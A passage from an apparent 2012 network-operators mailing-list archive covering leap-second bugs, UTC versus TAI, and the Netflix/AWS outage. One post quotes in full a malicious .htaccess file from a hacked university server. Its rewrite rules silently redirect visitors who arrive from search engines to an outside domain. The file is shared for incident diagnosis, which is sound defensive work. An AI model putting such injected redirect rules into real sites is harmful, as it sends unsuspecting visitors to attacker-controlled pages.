<596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> Message-ID: <4FF2FB79.9000306@bogus.com> On 7/3/12 01:54 , Wolfgang S. Rupprecht wrote: > > Steven Bellovin writes: >> See >> http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html > > Maybe we should stop wrenching the poor system time back and forth. We > no longer add or subtract daylight savings time (or timezones) to the > kernel time, why do we do it with leapseconds? We should really move > the leapseconds correction into the display routines like DST and > timezones already are. I believe the Olson time code already has ifdefs > for doing this. I wonder why the system's internal time isn't run that > way. Neither timezones nor dst impact length of the mean solar day. TAI is some 35 seconds ahead of UTC this point. and will continue to diverge in a fashion which is not sufficiently predictable that you can know over the long term. Not using utc as the timebase is certainly possible, gps does that for example. Apps are buggy sounds like a really poor excuse for doing so. > -wolfgang > From valdis.kletnieks at vt.edu Tue Jul 3 09:33:21 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 03 Jul 2012 10:33:21 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Your message of "Tue, 03 Jul 2012 12:31:03 +0300." <20120703093103.GA9947@pob.ytti.fi> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> Message-ID: <214705.1341326001@turing-police.cc.vt.edu> On Tue, 03 Jul 2012 12:31:03 +0300, Saku Ytti said: > Yes. TAI time natively and presentation uses leap lookup tables to convert > to UTC. On the other hand, how many subtle bugs will we introduce when we break code that currently assumes the system clock is UTC, not TAI? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From saku at ytti.fi Tue Jul 3 09:39:55 2012 From: saku at ytti.fi (Saku Ytti) Date: Tue, 3 Jul 2012 17:39:55 +0300 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <214705.1341326001@turing-police.cc.vt.edu> References: <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> Message-ID: <20120703143955.GA15933@pob.ytti.fi> On (2012-07-03 10:33 -0400), valdis.kletnieks at vt.edu wrote: > On the other hand, how many subtle bugs will we introduce when we break > code that currently assumes the system clock is UTC, not TAI? Progress has non zero cost :) -- ++ytti From valdis.kletnieks at vt.edu Tue Jul 3 09:51:29 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 03 Jul 2012 10:51:29 -0400 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: Your message of "Tue, 03 Jul 2012 07:02:33 -0700." <4FF2FB79.9000306@bogus.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <4FF2FB79.9000306@bogus.com> Message-ID: <217021.1341327089@turing-police.cc.vt.edu> On Tue, 03 Jul 2012 07:02:33 -0700, Joel jaeggli said: > Apps are buggy sounds like a really poor excuse for doing so. When the published API has been "the system clock is in UTC" for some 3 decades, I hardly think it's acceptable to call apps "buggy" for assuming that the system clock is in fact using UTC and breaking if you switch it to something that's not UTC. And the new time *has* to have different semantics than UTC, because if it doesn't then what's the point of changing it? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From malayter at gmail.com Tue Jul 3 09:58:22 2012 From: malayter at gmail.com (Ryan Malayter) Date: Tue, 3 Jul 2012 09:58:22 -0500 Subject: FYI Netflix is down Message-ID: James Downs wrote: > For Netflix (and all other similar > services) downtime is money and money is downtime. There is a > quantifiable cost for customer acquisition and a quantifiable churn > during each minute of downtime. Mature organizations actually calculate > and track this. The trick is to ensure that you have balanced the cost > of greater redundancy vs the cost of churn/customer acquisition. If you > are spending too much on redundancy, it's as big of mistake as spending > too little. Actually, for Netflix, so long as downtime is infrequent or short enough that users don't cancel, it actually saves them money. They're not paying royalties for movies being streamed during downtime, but they're still collecting their $8/month. There is no meaningful SLA for the end user to my knowledge. I imagine the threshold for *any* user churn based on downtime is very high for Netflix. So long as they are "about as good as cable/sattelite TV" in terms of uptime Netflix will do fine. You would have to get into 98% uptime or lower before people would really start getting irritated enough to cancel. Of course multiple short outages would be more painful than a few longer ones from a customer's perspective. I imagine Netflix is mature enough to track this data as you suggest, and that's why they use AWS - downtime isn't a big deal for their business unless it gets really, really bad. From egon at egon.cc Tue Jul 3 10:15:18 2012 From: egon at egon.cc (James Downs) Date: Tue, 3 Jul 2012 08:15:18 -0700 Subject: FYI Netflix is down In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: <5DFD0BE3-23CF-43AF-8918-54BD37D5ED63@egon.cc> On Jul 3, 2012, at 6:11 AM, Dan Golding wrote: > Also, I don't think there is an acceptable level of downtime for water. > Neither do water utilities. I remember a certain conversation I had with a web-developer. We were talking about "zero downtime releases". He thought it was acceptable if the website went down for 15 minutes, "because people will just come back". Naturally, he was not as forgiving about the idea that his bank might think the same way, or that I might provide DB or server uptimes with that kind of reliability. Downtime will kill some companies, and not others. Twitter certainly survived their fail-whale period. But then, no one pays for twitter. -j From joelja at bogus.com Tue Jul 3 10:18:47 2012 From: joelja at bogus.com (Joel jaeggli) Date: Tue, 03 Jul 2012 08:18:47 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <217021.1341327089@turing-police.cc.vt.edu> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <4FF2FB79.9000306@bogus.com> <217021.1341327089@turing-police.cc.vt.edu> Message-ID: <4FF30D57.9010605@bogus.com> On 7/3/12 07:51 , valdis.kletnieks at vt.edu wrote: > On Tue, 03 Jul 2012 07:02:33 -0700, Joel jaeggli said: > >> Apps are buggy sounds like a really poor excuse for doing so. > > When the published API has been "the system clock is in UTC" for some 3 > decades, I hardly think it's acceptable to call apps "buggy" for assuming that > the system clock is in fact using UTC and breaking if you switch it to > something that's not UTC. And the new time *has* to have different semantics > than UTC, because if it doesn't then what's the point of changing it? right you and I agree, proposing to switch off UTC becuase of buggy applications is a rather bad premise. software runs into trouble with the handling of leap years. yet few people (apart from perhaps the orthdox church is proposing to throw off the julian and gregorian calender reforms. From ag4ve.us at gmail.com Tue Jul 3 10:35:00 2012 From: ag4ve.us at gmail.com (shawn wilson) Date: Tue, 3 Jul 2012 11:35:00 -0400 Subject: Fwd: Re: F-ckin Leap Seconds, how do they work? In-Reply-To: References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <4FF2FB79.9000306@bogus.com> Message-ID: ---------- Forwarded message ---------- From: "shawn wilson" Date: Jul 3, 2012 11:33 AM Subject: Re: F-ckin Leap Seconds, how do they work? To: "Joel jaeggli" I agree with TAI. Epoch is supposed to be an unsigned long int starting ~1970 (there are are 4 epochs iirc, but never mind that). I don't recall the rfc, but I don't recall this spec mentioning leap seconds (and it shouldn't). Frankly our time system is buggy as hell (no year 0, base 60 seconds and minutes, base 24 hours, no standard month base, e/m isn't a part of the system, etc). I find my last issue the most disconcerting with our system and makes it really unreliable - GPS time is *not* earth time and we rely on that skew for everything. To that point, I hate to think how many missile tests it took them to figure that one out :) However there is no reason to add more crap to an already messed up system. On Jul 3, 2012 10:03 AM, "Joel jaeggli" wrote: > On 7/3/12 01:54 , Wolfgang S. Rupprecht wrote: > > > > Steven Bellovin writes: > >> See > >> > http://landslidecoding.blogspot.com/2012/07/linuxs-leap-second-deadlocks.html > > > > Maybe we should stop wrenching the poor system time back and forth. We > > no longer add or subtract daylight savings time (or timezones) to the > > kernel time, why do we do it with leapseconds? We should really move > > the leapseconds correction into the display routines like DST and > > timezones already are. I believe the Olson time code already has ifdefs > > for doing this. I wonder why the system's internal time isn't run that > > way. > > Neither timezones nor dst impact length of the mean solar day. > > TAI is some 35 seconds ahead of UTC this point. and will continue to > diverge in a fashion which is not sufficiently predictable that you can > know over the long term. > > Not using utc as the timebase is certainly possible, gps does that for > example. > > Apps are buggy sounds like a really poor excuse for doing so. > > > > -wolfgang > > > > > > From rodrick.brown at gmail.com Tue Jul 3 10:35:06 2012 From: rodrick.brown at gmail.com (Rodrick Brown) Date: Tue, 3 Jul 2012 11:35:06 -0400 Subject: FYI Netflix is down In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: On Jul 3, 2012, at 9:11 AM, "Dan Golding" wrote: >> -----Original Message----- >> From: James Downs [mailto:egon at egon.cc] >> >> >> On Jul 2, 2012, at 7:19 PM, Rodrick Brown wrote: >> >>> People are acting as if Netflix is part of some critical service > they >> stream movies for Christ sake. Some acceptable level of loss is fine >> for 99.99% of Netflix's user base just like cable, electricity and >> running water I suffer a few hours of losses each year from those >> services it suck yes, is it the end of the world no.. >> >> You missed the point. > > And very publically missed the point, too. The Netflix issues led to a > large discussion of downtime, testing, and fault tolerance that has been > very useful for the community and could lead to some good content for > NANOG conferences (/pokes PC). For Netflix (and all other similar > services) downtime is money and money is downtime. There is a > quantifiable cost for customer acquisition and a quantifiable churn > during each minute of downtime. Mature organizations actually calculate > and track this. The trick is to ensure that you have balanced the cost > of greater redundancy vs the cost of churn/customer acquisition. If you > are spending too much on redundancy, it's as big of mistake as spending > too little. I totally got the point and the last bit of my post was just tongue in cheek. As I stated in my original response it's very unrealistic to plan for every possible failure scenario given the constraints most businesses face when implementing BCP today. I doubt Amazon gave much thought to multiple site outages and clients not being able to dynamically redeploy their engines because of inaccessibility from ELB. > > Also, I don't think there is an acceptable level of downtime for water. > Neither do water utilities. > > - Dan > From rodrick.brown at gmail.com Tue Jul 3 10:36:44 2012 From: rodrick.brown at gmail.com (Rodrick Brown) Date: Tue, 3 Jul 2012 11:36:44 -0400 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: <985726B7-D435-4C22-9D48-1108EDCA6232@gmail.com> On Jul 3, 2012, at 10:58 AM, Ryan Malayter wrote: > James Downs wrote: >> For Netflix (and all other similar >> services) downtime is money and money is downtime. There is a >> quantifiable cost for customer acquisition and a quantifiable churn >> during each minute of downtime. Mature organizations actually calculate >> and track this. The trick is to ensure that you have balanced the cost >> of greater redundancy vs the cost of churn/customer acquisition. If you >> are spending too much on redundancy, it's as big of mistake as spending >> too little. > > Actually, for Netflix, so long as downtime is infrequent or short > enough that users don't cancel, it actually saves them money. They're > not paying royalties for movies being streamed during downtime, but > they're still collecting their $8/month. There is no meaningful SLA > for the end user to my knowledge. > > I imagine the threshold for *any* user churn based on downtime is very > high for Netflix. So long as they are "about as good as > cable/sattelite TV" in terms of uptime Netflix will do fine. You would > have to get into 98% uptime or lower before people would really start > getting irritated enough to cancel. Of course multiple short outages > would be more painful than a few longer ones from a customer's > perspective. > > I imagine Netflix is mature enough to track this data as you suggest, > and that's why they use AWS - downtime isn't a big deal for their > business unless it gets really, really bad. > My thoughts exactly! From drais at icantclick.org Tue Jul 3 11:06:31 2012 From: drais at icantclick.org (david raistrick) Date: Tue, 3 Jul 2012 12:06:31 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> <92F55DE9-EBFF-48D3-B823-5A529A6CF34D@egon.cc> <7CEE65E1-A4D6-44B3-8686-4222F436D9A6@egon.cc> <1C7B96053DD7814496A0D1E71661B68302CF5CEA@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: On Tue, 3 Jul 2012, Rodrick Brown wrote: > face when implementing BCP today. I doubt Amazon gave much thought to > multiple site outages and clients not being able to dynamically redeploy > their engines because of inaccessibility from ELB. Considering there's a grand total of -one- tool in the entirely AWS toolkit that supports working across multiple regions at all sanely (that would be ec2-migrate-bundle, btw), I'd agree. Amazon has put nearly zero thought into multiple site outages or how their customer base could leverage the multiple sites (regions) operated by AWS. -- david raistrick http://www.netmeister.org/news/learn2quote.html drais at icantclick.org From valdis.kletnieks at vt.edu Tue Jul 3 11:53:02 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 03 Jul 2012 12:53:02 -0400 Subject: Fwd: Re: F-ckin Leap Seconds, how do they work? In-Reply-To: Your message of "Tue, 03 Jul 2012 11:35:00 -0400." References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <4FF2FB79.9000306@bogus.com> Message-ID: <8251.1341334382@turing-police.cc.vt.edu> On Tue, 03 Jul 2012 11:35:00 -0400, shawn wilson said: > and makes it really unreliable - GPS time is *not* earth time and we rely > on that skew for everything. To that point, I hate to think how many > missile tests it took them to figure that one out :) Actually, GPS time is pretty ugly mathematically, as it has to make relativistic corrections for time dilation due to speed of the satellites and for gravity-well dilation (which are in opposite directions). You don't want to go there in a world where programmers still get the 400 rule for leap years wrong. ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From cmadams at hiwaay.net Tue Jul 3 11:58:00 2012 From: cmadams at hiwaay.net (Chris Adams) Date: Tue, 3 Jul 2012 11:58:00 -0500 Subject: Fwd: Re: F-ckin Leap Seconds, how do they work? In-Reply-To: <8251.1341334382@turing-police.cc.vt.edu> References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <4FF2FB79.9000306@bogus.com> <8251.1341334382@turing-police.cc.vt.edu> Message-ID: <20120703165800.GA3723@hiwaay.net> Once upon a time, valdis.kletnieks at vt.edu said: > Actually, GPS time is pretty ugly mathematically, as it has to make > relativistic corrections for time dilation due to speed of the satellites > and for gravity-well dilation (which are in opposite directions). That's how GPS _calculates_ the time, but "GPS time" (i.e. time as reported by GPS) is a constant offset from TAI (TAI - UTC as of 1980). -- Chris Adams Systems and Network Administrator - HiWAAY Internet Services I don't speak for anybody but myself - that's enough trouble. From jlewis at lewis.org Tue Jul 3 12:06:53 2012 From: jlewis at lewis.org (Jon Lewis) Date: Tue, 3 Jul 2012 13:06:53 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEE978E.8060300@gmail.com> <4FEEAB1B.7030806@deaddrop.org> Message-ID: On Mon, 2 Jul 2012, Greg D. Moore wrote: > As for pulling the plug to test stuff. I recall a demo at Netapps in the > early 00's. They were talking about their fault tolerance and how great it > was. So I walked up to their demo array and said, "So, it shouldn't be a > problem if I pulled this drive right here?" Before I could the salesperson > or tech guy, can't remember, told me to stop. He didn't want to risk it. Lightweight. Your story reminded me of this Sun ZFS demo. http://www.youtube.com/watch?v=QGIwg6ye1gE ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From jlewis at lewis.org Tue Jul 3 12:13:39 2012 From: jlewis at lewis.org (Jon Lewis) Date: Tue, 3 Jul 2012 13:13:39 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: References: <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> <20120702160909.GA65216@ussenterprise.ufp.org> <20120702161746.GA65753@ussenterprise.ufp.org> <20120702175300.GA69672@ussenterprise.ufp.org> <4FF1EFAD.6000204@paulgraydon.co.uk> Message-ID: On Mon, 2 Jul 2012, david raistrick wrote: > On Mon, 2 Jul 2012, James Downs wrote: > >>> back-plane / control-plane was unable to cope with the requests. Netflix >>> uses Amazon's ELB to balance the traffic and no back-plane meant they were >>> unable to reconfigure it to route around the problem. >> >> Someone needs to define back-plane/control-plane in this case. (and what >> wasn't working) > > Amazon resources are controlled (from a consumer viewpoint) by API - that API > is also used by amazon's internal toolkits that support ELB (and RDS..). > Those (http accessed) API interfaces were unavailable for a good portion of > the outages. It seems like if you're going to outsource your mission critical infrastructure to "cloud" you should probably pick at least 2 unrelated cloud providers and if at all possible, not outsource the systems that balance/direct traffic...and if you're really serious about it, have at least two of these setup at different facilities such that if the primary goes offline, the secondary takes over. If a cloud provider fails, you redirect to another. ---------------------------------------------------------------------- Jon Lewis, MCP :) | I route Senior Network Engineer | therefore you are Atlantic Net | _________ http://www.lewis.org/~jlewis/pgp for PGP public key_________ From owen at delong.com Tue Jul 3 12:11:23 2012 From: owen at delong.com (Owen DeLong) Date: Tue, 3 Jul 2012 10:11:23 -0700 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <20120703143955.GA15933@pob.ytti.fi> References: <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> Message-ID: <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> On Jul 3, 2012, at 7:39 AM, Saku Ytti wrote: > On (2012-07-03 10:33 -0400), valdis.kletnieks at vt.edu wrote: > >> On the other hand, how many subtle bugs will we introduce when we break >> code that currently assumes the system clock is UTC, not TAI? > > Progress has non zero cost :) > > -- > ++ytti Trading one known set of bugs for a (probably) larger set of unknown bugs is not my definition of progress. Cost without progress is harmful and should be avoided. Owen From sethm at rollernet.us Tue Jul 3 12:38:03 2012 From: sethm at rollernet.us (Seth Mattinen) Date: Tue, 03 Jul 2012 10:38:03 -0700 Subject: FYI Netflix is down In-Reply-To: References: Message-ID: <4FF32DFB.8080703@rollernet.us> On 6/29/12 8:22 PM, Joe Blanchard wrote: > Seems that they are unreachable at the moment. Called and theres a recorded > message stating they are aware of an issue, no details. > I didn't see anyone post this yet, so here's Amazon's summary of events: http://aws.amazon.com/message/67457/ From jra at baylink.com Tue Jul 3 12:38:15 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 3 Jul 2012 13:38:15 -0400 (EDT) Subject: FYI Netflix is down In-Reply-To: Message-ID: <24628127.12292.1341337095357.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Steven Bellovin" > Subject: Re: FYI Netflix is down > On Jul 2, 2012, at 3:43 PM, Greg D. Moore wrote: > > > At 03:08 PM 7/2/2012, George Herbert wrote: > > > > If folks have not read it, I would suggest reading Normal Accidents > > by Charles Perrow. > > Strong second to that suggestion. Quite unfortunately, that book appears not to be in Safari's library. Does anyone here know anyone at Safari? Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From saku at ytti.fi Tue Jul 3 12:59:05 2012 From: saku at ytti.fi (Saku Ytti) Date: Tue, 3 Jul 2012 20:59:05 +0300 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> References: <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> <878vf1i5sb.fsf@arbol.wsrcc.com> <20120703093103.GA9947@pob.ytti.fi> <214705.1341326001@turing-police.cc.vt.edu> <20120703143955.GA15933@pob.ytti.fi> <82E63601-6AC2-4582-879B-73CE9A7C87FB@delong.com> Message-ID: <20120703175905.GA15977@pob.ytti.fi> On (2012-07-03 10:11 -0700), Owen DeLong wrote: > Trading one known set of bugs for a (probably) larger set of unknown bugs is not my definition of progress. Cost without progress is harmful and should be avoided. Leap bugs are NOT known. Most people have no idea unixtime is not monotonically increasing. I had no idea myself until sunday, I had assumed we really go 59 -> 60 -> 00, but we go 59 -> 59 -> 00. So 59.1 can happen before or after 59.2. To me this is fundamentally and inherently broken. It's quite hard to find code which stores timestamp and then compares it in future to timestamp which assumes time can travel backwards. Most bugs are just things that should last 5s last 6s or 4s, but certainly the bugs exist and developers were not aware that they exist. -- ++ytti From kyle.creyts at gmail.com Tue Jul 3 13:27:41 2012 From: kyle.creyts at gmail.com (Kyle Creyts) Date: Tue, 3 Jul 2012 14:27:41 -0400 Subject: No DNS poisoning at Google (in case of trouble, blame the DNS) In-Reply-To: References: <20120627075051.GA11061@nic.fr> <20120627132604.GA74019@DataIX.net> Message-ID: it actually appears that skywire has a suballocation for that block, http://www.robtex.com/ip/208.88.11.111.html#whois # # The following results may also be obtained via: # http://whois.arin.net /rest/nets;q=208.88.11.111 ?showDetails=true&showARIN=false&ext=netref2 # American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0 - 208.88.11.255 Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255 # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net /whois_tou.html # On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black wrote: > By the way, FTP access originated from: 208.88.11.111 > > Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - > 208.88.11.255 > > NetRange: 208.88.8.0 - 208.88.11.255 > CIDR: 208.88.8.0/22 > OriginAS: AS40603 > NetName: SKYWIRE-SG > NetHandle: NET-208-88-8-0-1 > Parent: NET-208-0-0-0-0 > NetType: Direct Allocation > Comment: http://www.skywireusa.com > RegDate: 2008-03-04 > Updated: 2012-03-02 > Ref: http://whois.arin.net/rest/net/NET-208-88-8-0-1 > > OrgName: Sky Wire Communications > OrgId: DGSU > Address: 946 W Sunset Blvd Ste L > City: St George > StateProv: UT > PostalCode: 84770 > Country: US > RegDate: 2007-12-04 > Updated: 2009-11-04 > Ref: http://whois.arin.net/rest/org/DGSU > > > Who We Are > Skywire Communications is the Leading High Speed Internet Provider in > Southern Utah. Offering Service in St George, Washington, Santa Clara, > Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to > provide high speed internet access to 100 Percent of Southern Utah. We are > located in St George, Utah. > > > > > matthew black > information technology services > california state university, long beach > > > > -----Original Message----- > From: Matthew Black [mailto:Matthew.Black at csulb.edu] > Sent: Wednesday, June 27, 2012 9:52 AM > To: 'Jason Hellenthal'; Arturo Servin > Cc: nanog at nanog.org > Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS) > > Ask and ye shall receive: > > # more .htaccess (backup copy) > > #c3284d# > > RewriteEngine On > RewriteCond %{HTTP_REFERER} > ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt > > avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea > > rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d > > ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel > > and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea > > rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick| > > jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l > > ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse > > arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea > > rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s > > uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin > > e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche| > > westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) > RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] > > #/c3284d# > > # # # > > matthew black > information technology services > california state university, long beach > > > > -----Original Message----- > From: Jason Hellenthal [mailto:jhellenthal at dataix.net] > Sent: Wednesday, June 27, 2012 6:26 AM > To: Arturo Servin > Cc: nanog at nanog.org > Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS) > > > What would be nice is the to see the contents of the htaccess file > (obviously with sensitive information excluded) > > On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: > > > > It was not DNS issue, but it was a clear case on how community-support > helped. > > > > Some of us may even learn some new tricks. :) > > > > Regards, > > as > > > > Sent from mobile device. Excuse brevity and typos. > > > > > > On 27 Jun 2012, at 05:07, Daniel Rohan wrote: > > > > > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer < > bortzmeyer at nic.fr>wrote: > > > > > > What made you think 